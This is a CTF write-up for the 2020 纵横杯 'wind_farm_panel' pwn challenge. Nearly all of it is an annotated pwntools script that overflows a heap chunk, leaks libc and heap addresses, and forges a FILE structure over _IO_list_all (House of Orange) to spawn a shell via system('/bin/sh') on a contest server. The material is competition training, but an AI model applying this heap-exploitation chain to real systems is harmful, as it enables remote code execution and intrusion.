纵横杯 2020 Pwn wind_farm_panel
source link: https://xuanxuanblingbling.github.io/ctf/pwn/2020/12/28/orange/
纵横杯 2020 Pwn wind_farm_panel
发表于 2020-12-28
| 分类于 CTF/Pwn
house_of_orange原题
# Exploit script for the 纵横杯 2020 "wind_farm_panel" pwn challenge.
# The writeup labels it a House of Orange instance; the libc shipped with the
# challenge is glibc 2.23 (libc-2.23.so below), which is what the constants
# in this script are tied to. Every offset here is specific to that binary
# and libc build.
#
# NOTE(review): the payload lines concatenate str with p64() output
# ("a"*136 + p64(0xf71)). Under Python 3 pwntools p64 returns bytes, so
# these lines raise TypeError; the script as written assumes Python 2.
from pwn import *
context(arch='amd64',os='linux',log_level='debug')
myelf = ELF("./pwn")
libc = ELF("./libc-2.23.so")
# Local run (commented out) preloads the challenge libc; the live run below
# targets the contest instance.
#io = process(myelf.path,env={"LD_PRELOAD" : libc.path})
io = remote("182.92.203.154",28452)
# Pad a short leak to 8 bytes and unpack it as a little-endian u64.
uu64 = lambda data : u64(data.ljust(8, b'\0'))
sla = lambda delim,data : (io.sendlineafter(delim, data))
sa = lambda delim,data : (io.sendafter(delim, data))
# Menu wrappers: option 1 creates a turbine (index 0-5, size, name),
# option 2 prints one, option 3 rewrites one's contents.
add = lambda index,size,data : (sla(">> ","1"),sla("on(0 ~ 5):",str(index)),sla("turbine: ",str(size)),sa("name: ",data))
show = lambda index : (sla(">> ","2"),sla("viewed: ",str(index)))
edit = lambda index,data : (sla(">> ","3"),sla("turbine: ",str(index)),sa("input: ",data))
#gdb.attach(io,"")
# Root cause being exercised: a 130-byte turbine receives 144 bytes of name
# data (136 filler + an 8-byte value), so the service presumably does not
# bound the copy to the requested size. The 8 bytes past the filler land on
# the next chunk's size field (0xf71).
add(0,130,"a"*136+p64(0xf71))
add(1,0x1000,"xuan")
add(2,0x200,"xuan")
# leak libc
# Overwrite through the size field with a marker, then read the 6 bytes that
# follow it; the subtracted offset is the author's constant for this libc.
edit(0,"a"*144+"b"*8)
show(0);io.recvuntil("b"*8)
libc_addr = uu64(io.recv(6))-0x3c5188
log.success(hex(libc_addr))
# Restore the size field clobbered by the leak write.
edit(0,"a"*136+p64(0xf71))
libc.address = libc_addr
# leak heap
# Same pattern, 8 bytes further in, to read a heap pointer.
edit(0,"a"*152+"b"*8)
show(0);io.recvuntil("b"*8)
heap_addr = uu64(io.recv(6))
log.success(hex(heap_addr))
edit(0,"a"*136+p64(0xf71))
# unsortedbin attack
# Crafted overwrite placed 0x290 bytes into turbine 0. The field layout and
# constants are the author's and depend on the libc build and the heap
# address leaked above; they are not meaningful in isolation.
data = "a"*(0x290)
payload = "/bin/sh\x00" + p64(0x61)
payload += p64(0) + p64(libc.symbols['_IO_list_all']-0x10)
payload += p64(0) + p64(1)
payload = payload.ljust(0xd8, "\x00")
payload += p64(heap_addr + 0x210 + 0xd8 + 0x8)+p64(libc.symbols['system'])*8
edit(0,data+payload)
# tigger
# One more allocation (index 4, size 200) drives the service into the
# corrupted state; the prompt sequence is the same as add() without a name.
sla(">> ","1")
sla("on(0 ~ 5):",str(4))
sla("turbine: ",str(200))
io.interactive()